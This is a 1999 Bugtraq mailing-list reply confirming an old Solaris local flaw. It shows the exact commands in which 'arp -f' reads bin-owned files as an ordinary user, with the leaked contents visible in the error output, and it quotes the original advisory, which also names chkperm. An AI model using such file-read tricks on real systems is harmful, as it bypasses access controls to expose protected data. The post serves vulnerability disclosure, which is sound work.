Home page logo
/

bugtraq logo Bugtraq mailing list archives

Re: Solaris 2.x chkperm/arp vulnerabilities
From: lwcashd () BIW COM (Larry W. Cashdollar)
Date: Wed, 1 Dec 1999 14:18:53 -0500


Arp bug Verified for my Solaris 5.6 and 5.5.1 Installs.

$ uname -a
SunOS pangea 5.5.1 Generic_103640-26 sun4u sparc SUNW,Ultra-5_10

# uname -a
SunOS vapid 5.6 Generic_105181-05 sun4u sparc SUNW,Ultra-5_10
#

$ ls -l /etc/bin
-rw-rw----   1 bin      bin           23 Dec  1 13:54 /etc/bin

On both machines I could read bin:bin owned files as a regular joe user with arp
-f.

bash-2.00$ /usr/sbin/arp -f /etc/bin
arp: ze: unknown host
arp: ze: unknown host
arp: zeperliz: unknown host
arp: zeperliz: unknown host
arp: zeperliz: unknown host
arp: zeperliz: unknown host
arp: zeperliz: unknown host
arp: ze: unknown host
arp: zeperl: unknown host
arp: bad line: zeperlizinzeliver

As you can see arp will only print until the first white space or newline.

# cat /etc/bin
ze perl iz in ze liver
ze perl iz in ze liver
zeperliz in ze liver
zeperliz in ze liver
zeperliz in ze liver
zeperliz in ze liver
zeperliz in ze liver
ze perl iz in ze liver
zeperl iz in ze liver
zeperlizinzeliver
zeperl iz in ze liver
ze perl iz in ze liver

  Brock wrote:


Greetings,

OVERVIEW
/usr/vmsys/bin/chkperm and /usr/sbin/arp can be used to read bin-owned files.

BACKGROUND
All my testing was done on Solaris 2.7 and 2.6 SPARC edition.



Vuln #2 - arp

Just as the first, you may read any bin owned files:
bash-2.02$ ls -la /etc/bin
-rw-rw----   1 bin      bin           45 Nov 15 16:44 /etc/bin
bash-2.02$ cat /etc/bin
cat: cannot open /etc/bin
bash-2.02$ /usr/sbin/arp -f /etc/bin
arp: bad line: seekret1

arp: bad line: seekret2

arp: bad line: seekret3

arp: bad line: seekret4

arp: bad line: seekret5


Larry W. Cashdollar                     R2D2 r00t3d the death star.             
http://vapid.dhs.org


  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]